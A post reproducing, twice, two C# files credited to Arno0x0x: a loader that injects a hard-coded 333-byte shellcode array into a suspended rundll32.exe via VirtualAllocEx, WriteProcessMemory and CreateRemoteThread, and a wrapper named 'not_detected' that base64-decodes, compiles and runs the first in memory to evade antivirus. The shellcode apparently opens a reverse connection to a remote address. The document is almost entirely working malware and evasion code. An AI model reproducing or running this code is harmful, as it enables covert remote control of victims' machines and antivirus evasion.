TechByTom · February 1, 2018 17:55
diff --git a/malicious.cs b/malicious.cs
 /*
 Author: Arno0x0x, Twitter: @Arno0x0x

 DO NOT COMPILE THIS SOURCE FILE !

 Encode this source in base64:
 base64 -w0 malicious.cs > malicious.b64

 Then paste it in the code in "not_detected.cs" source file

 */

 using System.Diagnostics;
 using System.Runtime.InteropServices;
 using System;
 using System.Text;
 public class nastyLittleDuck
 {
    [StructLayout(LayoutKind.Sequential)]
    public class SecurityAttributes
    {
        public Int32 Length = 0;
        public IntPtr lpSecurityDescriptor = IntPtr.Zero;
        public bool bInheritHandle = false;

        public SecurityAttributes()
        {
            this.Length = Marshal.SizeOf(this);
        }
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct ProcessInformation
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public Int32 dwProcessId;
        public Int32 dwThreadId;
    }
    [Flags]
    public enum CreateProcessFlags : uint
    {
        DEBUG_PROCESS = 0x00000001,
        DEBUG_ONLY_THIS_PROCESS = 0x00000002,
        CREATE_SUSPENDED = 0x00000004,
        DETACHED_PROCESS = 0x00000008,
        CREATE_NEW_CONSOLE = 0x00000010,
        NORMAL_PRIORITY_CLASS = 0x00000020,
        IDLE_PRIORITY_CLASS = 0x00000040,
        HIGH_PRIORITY_CLASS = 0x00000080,
        REALTIME_PRIORITY_CLASS = 0x00000100,
        CREATE_NEW_PROCESS_GROUP = 0x00000200,
        CREATE_UNICODE_ENVIRONMENT = 0x00000400,
        CREATE_SEPARATE_WOW_VDM = 0x00000800,
        CREATE_SHARED_WOW_VDM = 0x00001000,
        CREATE_FORCEDOS = 0x00002000,
        BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
        ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
        INHERIT_PARENT_AFFINITY = 0x00010000,
        INHERIT_CALLER_PRIORITY = 0x00020000,
        CREATE_PROTECTED_PROCESS = 0x00040000,
        EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
        PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
        PROCESS_MODE_BACKGROUND_END = 0x00200000,
        CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
        CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
        CREATE_DEFAULT_ERROR_MODE = 0x04000000,
        CREATE_NO_WINDOW = 0x08000000,
        PROFILE_USER = 0x10000000,
        PROFILE_KERNEL = 0x20000000,
        PROFILE_SERVER = 0x40000000,
        CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
    }
    [Flags]
    public enum DuplicateOptions : uint
    {
        DUPLICATE_CLOSE_SOURCE = 0x00000001,
        DUPLICATE_SAME_ACCESS = 0x00000002
    }
    [StructLayout(LayoutKind.Sequential)]
    public class StartupInfo
    {
        public Int32 cb = 0;
        public IntPtr lpReserved = IntPtr.Zero;
        public IntPtr lpDesktop = IntPtr.Zero; // MUST be Zero
        public IntPtr lpTitle = IntPtr.Zero;
        public Int32 dwX = 0;
        public Int32 dwY = 0;
        public Int32 dwXSize = 0;
        public Int32 dwYSize = 0;
        public Int32 dwXCountChars = 0;
        public Int32 dwYCountChars = 0;
        public Int32 dwFillAttribute = 0;
        public Int32 dwFlags = 0;
        public Int16 wShowWindow = 0;
        public Int16 cbReserved2 = 0;
        public IntPtr lpReserved2 = IntPtr.Zero;
        public IntPtr hStdInput = IntPtr.Zero;
        public IntPtr hStdOutput = IntPtr.Zero;
        public IntPtr hStdError = IntPtr.Zero;
        public StartupInfo()
        {
            this.cb = Marshal.SizeOf(this);
        }
    }
    [Flags()]
    public enum AllocationType : uint
    {
        COMMIT = 0x1000,
        RESERVE = 0x2000,
        GO = 0x3000,
        RESET = 0x80000,
        LARGE_PAGES = 0x20000000,
        PHYSICAL = 0x400000,
        TOP_DOWN = 0x100000,
        WRITE_WATCH = 0x200000
    }
    [Flags()]
    public enum MemoryProtection : uint
    {
        EXECUTE = 0x10,
        EXECUTE_READ = 0x20,
        EXECUTE_READWRITE = 0x40,
        EXECUTE_WRITECOPY = 0x80,
        NOACCESS = 0x01,
        READONLY = 0x02,
        READWRITE = 0x04,
        WRITECOPY = 0x08,
        GUARD_Modifierflag = 0x100,
        NOCACHE_Modifierflag = 0x200,
        WRITECOMBINE_Modifierflag = 0x400
    }
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateProcessA(
            String lpApplicationName,
            String lpCommandLine,
            SecurityAttributes lpProcessAttributes,
            SecurityAttributes lpThreadAttributes,
            Boolean bInheritHandles,
            CreateProcessFlags dwCreationFlags,
            IntPtr lpEnvironment,
            String lpCurrentDirectory,
            [In] StartupInfo lpStartupInfo,
            out ProcessInformation lpProcessInformation

        );
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAllocEx(
           IntPtr lpHandle,
           IntPtr lpAddress,
           IntPtr dwSize,
           AllocationType flAllocationType,
           MemoryProtection flProtect
        );
    [DllImport("kernel32.dll")]
    public static extern bool WriteProcessMemory(
        IntPtr hProcess,
        IntPtr lpBaseAddress,
        byte[] buffer,
        IntPtr dwSize,
        int lpNumberOfBytesWritten);
    [DllImport("kernel32.dll")]
    public static extern bool TerminateProcess(
        IntPtr hProcess, 
        uint uExitCode);
    [DllImport("kernel32.dll")]
    static extern IntPtr CreateRemoteThread(
        IntPtr hProcess,
        IntPtr lpThreadAttributes,
        uint dwStackSize,
        IntPtr lpStartAddress,
        IntPtr lpParameter,
        uint dwCreationFlags,
        IntPtr lpThreadId);
    public static void Main()
    {
 		string binary = "rundll32.exe";
 		byte[] sc = new byte[333] {
 				0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
 				0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
 				0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
 				0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
 				0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
 				0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
 				0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
 				0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
 				0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
 				0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
 				0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
 				0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x34,0x86,0x68,0x02,
 				0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
 				0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
 				0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,
 				0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
 				0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
 				0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
 				0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,
 				0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
 				0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,
 				0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,
 				0x53,0xff,0xd5 };
        IntPtr size = new IntPtr(sc.Length);
        StartupInfo sInfo = new StartupInfo();
        sInfo.dwFlags = 0;
        ProcessInformation pInfo;
        string binaryPath = "";
        if (Environment.GetEnvironmentVariable("ProgramW6432").Length > 0)
        {
            binaryPath = Environment.GetEnvironmentVariable("windir") + "\\SysWOW64\\" + binary;
        }
        else
        {
            binaryPath = Environment.GetEnvironmentVariable("windir") + "\\System32\\" + binary;
        }
        IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
        IntPtr hProcess = pInfo.hProcess;
        if (hProcess.ToString() != "0") { 
            IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, AllocationType.GO, MemoryProtection.EXECUTE_READWRITE);
            if (spaceAddr.ToString() == "0")
            {
                TerminateProcess(hProcess, 0);
            }
            else
            {
                int test = 0;
                IntPtr size2 = new IntPtr(sc.Length);
                bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);
                CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
            }
        }
     }
 }
diff --git a/not_detected.cs b/not_detected.cs
 /*
 Author: Arno0x0x, Twitter: @Arno0x0x

 ===================================== COMPILING =====================================
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:not_detected2.exe not_detected2.cs

 */

 using System;
 using System.Text;
 using Microsoft.CSharp;
 using System.CodeDom.Compiler;
 using System.Reflection;

 class Program
 {
 	static void Main()
 	{
 		string code = Encoding.UTF8.GetString(Convert.FromBase64String("<--- malicious.cs BASE64 ENCODED--->"));
 		CSharpCodeProvider provider = new CSharpCodeProvider();
 		CompilerParameters parameters = new CompilerParameters();
 		parameters.ReferencedAssemblies.Add("System.dll");
 		parameters.GenerateInMemory = true;
 		parameters.GenerateExecutable = true;
 		CompilerResults results = provider.CompileAssemblyFromSource(parameters, code);
 		if (results.Errors.HasErrors)
 		{
 			StringBuilder sb = new StringBuilder();

 			foreach (CompilerError error in results.Errors)
 			{
 				sb.AppendLine(String.Format("Error ({0}): {1}", error.ErrorNumber, error.ErrorText));
 			}

 			throw new InvalidOperationException(sb.ToString());
 		}
 		Assembly assembly = results.CompiledAssembly;
 		Type program = assembly.GetType("nastyLittleDuck");
 		MethodInfo main = program.GetMethod("Main");
 		main.Invoke(null, null);
 	}
 }
	/*
	Author: Arno0x0x, Twitter: @Arno0x0x

	DO NOT COMPILE THIS SOURCE FILE !

	Encode this source in base64:
	base64 -w0 malicious.cs > malicious.b64

	Then paste it in the code in "not_detected.cs" source file

	*/

	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System;
	using System.Text;
	public class nastyLittleDuck
	{
	[StructLayout(LayoutKind.Sequential)]
	public class SecurityAttributes
	{
	public Int32 Length = 0;
	public IntPtr lpSecurityDescriptor = IntPtr.Zero;
	public bool bInheritHandle = false;

	public SecurityAttributes()
	{
	this.Length = Marshal.SizeOf(this);
	}
	}
	[StructLayout(LayoutKind.Sequential)]
	public struct ProcessInformation
	{
	public IntPtr hProcess;
	public IntPtr hThread;
	public Int32 dwProcessId;
	public Int32 dwThreadId;
	}
	[Flags]
	public enum CreateProcessFlags : uint
	{
	DEBUG_PROCESS = 0x00000001,
	DEBUG_ONLY_THIS_PROCESS = 0x00000002,
	CREATE_SUSPENDED = 0x00000004,
	DETACHED_PROCESS = 0x00000008,
	CREATE_NEW_CONSOLE = 0x00000010,
	NORMAL_PRIORITY_CLASS = 0x00000020,
	IDLE_PRIORITY_CLASS = 0x00000040,
	HIGH_PRIORITY_CLASS = 0x00000080,
	REALTIME_PRIORITY_CLASS = 0x00000100,
	CREATE_NEW_PROCESS_GROUP = 0x00000200,
	CREATE_UNICODE_ENVIRONMENT = 0x00000400,
	CREATE_SEPARATE_WOW_VDM = 0x00000800,
	CREATE_SHARED_WOW_VDM = 0x00001000,
	CREATE_FORCEDOS = 0x00002000,
	BELOW_NORMAL_PRIORITY_CLASS = 0x00004000,
	ABOVE_NORMAL_PRIORITY_CLASS = 0x00008000,
	INHERIT_PARENT_AFFINITY = 0x00010000,
	INHERIT_CALLER_PRIORITY = 0x00020000,
	CREATE_PROTECTED_PROCESS = 0x00040000,
	EXTENDED_STARTUPINFO_PRESENT = 0x00080000,
	PROCESS_MODE_BACKGROUND_BEGIN = 0x00100000,
	PROCESS_MODE_BACKGROUND_END = 0x00200000,
	CREATE_BREAKAWAY_FROM_JOB = 0x01000000,
	CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000,
	CREATE_DEFAULT_ERROR_MODE = 0x04000000,
	CREATE_NO_WINDOW = 0x08000000,
	PROFILE_USER = 0x10000000,
	PROFILE_KERNEL = 0x20000000,
	PROFILE_SERVER = 0x40000000,
	CREATE_IGNORE_SYSTEM_DEFAULT = 0x80000000,
	}
	[Flags]
	public enum DuplicateOptions : uint
	{
	DUPLICATE_CLOSE_SOURCE = 0x00000001,
	DUPLICATE_SAME_ACCESS = 0x00000002
	}
	[StructLayout(LayoutKind.Sequential)]
	public class StartupInfo
	{
	public Int32 cb = 0;
	public IntPtr lpReserved = IntPtr.Zero;
	public IntPtr lpDesktop = IntPtr.Zero; // MUST be Zero
	public IntPtr lpTitle = IntPtr.Zero;
	public Int32 dwX = 0;
	public Int32 dwY = 0;
	public Int32 dwXSize = 0;
	public Int32 dwYSize = 0;
	public Int32 dwXCountChars = 0;
	public Int32 dwYCountChars = 0;
	public Int32 dwFillAttribute = 0;
	public Int32 dwFlags = 0;
	public Int16 wShowWindow = 0;
	public Int16 cbReserved2 = 0;
	public IntPtr lpReserved2 = IntPtr.Zero;
	public IntPtr hStdInput = IntPtr.Zero;
	public IntPtr hStdOutput = IntPtr.Zero;
	public IntPtr hStdError = IntPtr.Zero;
	public StartupInfo()
	{
	this.cb = Marshal.SizeOf(this);
	}
	}
	[Flags()]
	public enum AllocationType : uint
	{
	COMMIT = 0x1000,
	RESERVE = 0x2000,
	GO = 0x3000,
	RESET = 0x80000,
	LARGE_PAGES = 0x20000000,
	PHYSICAL = 0x400000,
	TOP_DOWN = 0x100000,
	WRITE_WATCH = 0x200000
	}
	[Flags()]
	public enum MemoryProtection : uint
	{
	EXECUTE = 0x10,
	EXECUTE_READ = 0x20,
	EXECUTE_READWRITE = 0x40,
	EXECUTE_WRITECOPY = 0x80,
	NOACCESS = 0x01,
	READONLY = 0x02,
	READWRITE = 0x04,
	WRITECOPY = 0x08,
	GUARD_Modifierflag = 0x100,
	NOCACHE_Modifierflag = 0x200,
	WRITECOMBINE_Modifierflag = 0x400
	}
	[DllImport("kernel32.dll")]
	public static extern IntPtr CreateProcessA(
	String lpApplicationName,
	String lpCommandLine,
	SecurityAttributes lpProcessAttributes,
	SecurityAttributes lpThreadAttributes,
	Boolean bInheritHandles,
	CreateProcessFlags dwCreationFlags,
	IntPtr lpEnvironment,
	String lpCurrentDirectory,
	[In] StartupInfo lpStartupInfo,
	out ProcessInformation lpProcessInformation

	);
	[DllImport("kernel32.dll")]
	public static extern IntPtr VirtualAllocEx(
	IntPtr lpHandle,
	IntPtr lpAddress,
	IntPtr dwSize,
	AllocationType flAllocationType,
	MemoryProtection flProtect
	);
	[DllImport("kernel32.dll")]
	public static extern bool WriteProcessMemory(
	IntPtr hProcess,
	IntPtr lpBaseAddress,
	byte[] buffer,
	IntPtr dwSize,
	int lpNumberOfBytesWritten);
	[DllImport("kernel32.dll")]
	public static extern bool TerminateProcess(
	IntPtr hProcess,
	uint uExitCode);
	[DllImport("kernel32.dll")]
	static extern IntPtr CreateRemoteThread(
	IntPtr hProcess,
	IntPtr lpThreadAttributes,
	uint dwStackSize,
	IntPtr lpStartAddress,
	IntPtr lpParameter,
	uint dwCreationFlags,
	IntPtr lpThreadId);
	public static void Main()
	{
	string binary = "rundll32.exe";
	byte[] sc = new byte[333] {
	0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
	0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
	0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
	0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
	0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
	0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
	0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
	0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
	0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
	0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
	0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
	0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0x34,0x86,0x68,0x02,
	0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,
	0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
	0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,
	0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,
	0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,
	0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
	0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,
	0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,
	0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,
	0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,
	0x53,0xff,0xd5 };
	IntPtr size = new IntPtr(sc.Length);
	StartupInfo sInfo = new StartupInfo();
	sInfo.dwFlags = 0;
	ProcessInformation pInfo;
	string binaryPath = "";
	if (Environment.GetEnvironmentVariable("ProgramW6432").Length > 0)
	{
	binaryPath = Environment.GetEnvironmentVariable("windir") + "\\SysWOW64\\" + binary;
	}
	else
	{
	binaryPath = Environment.GetEnvironmentVariable("windir") + "\\System32\\" + binary;
	}
	IntPtr funcAddr = CreateProcessA(binaryPath, null, null, null, true, CreateProcessFlags.CREATE_SUSPENDED, IntPtr.Zero, null, sInfo, out pInfo);
	IntPtr hProcess = pInfo.hProcess;
	if (hProcess.ToString() != "0") {
	IntPtr spaceAddr = VirtualAllocEx(hProcess, new IntPtr(0), size, AllocationType.GO, MemoryProtection.EXECUTE_READWRITE);
	if (spaceAddr.ToString() == "0")
	{
	TerminateProcess(hProcess, 0);
	}
	else
	{
	int test = 0;
	IntPtr size2 = new IntPtr(sc.Length);
	bool bWrite = WriteProcessMemory(hProcess, spaceAddr, sc, size2, test);
	CreateRemoteThread(hProcess, new IntPtr(0), new uint(), spaceAddr, new IntPtr(0), new uint(), new IntPtr(0));
	}
	}
	}
	}
	/*
	Author: Arno0x0x, Twitter: @Arno0x0x

	===================================== COMPILING =====================================
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:not_detected2.exe not_detected2.cs

	*/

	using System;
	using System.Text;
	using Microsoft.CSharp;
	using System.CodeDom.Compiler;
	using System.Reflection;

	class Program
	{
	static void Main()
	{
	string code = Encoding.UTF8.GetString(Convert.FromBase64String("<--- malicious.cs BASE64 ENCODED--->"));
	CSharpCodeProvider provider = new CSharpCodeProvider();
	CompilerParameters parameters = new CompilerParameters();
	parameters.ReferencedAssemblies.Add("System.dll");
	parameters.GenerateInMemory = true;
	parameters.GenerateExecutable = true;
	CompilerResults results = provider.CompileAssemblyFromSource(parameters, code);
	if (results.Errors.HasErrors)
	{
	StringBuilder sb = new StringBuilder();

	foreach (CompilerError error in results.Errors)
	{
	sb.AppendLine(String.Format("Error ({0}): {1}", error.ErrorNumber, error.ErrorText));
	}

	throw new InvalidOperationException(sb.ToString());
	}
	Assembly assembly = results.CompiledAssembly;
	Type program = assembly.GetType("nastyLittleDuck");
	MethodInfo main = program.GetMethod("Main");
	main.Invoke(null, null);
	}
	}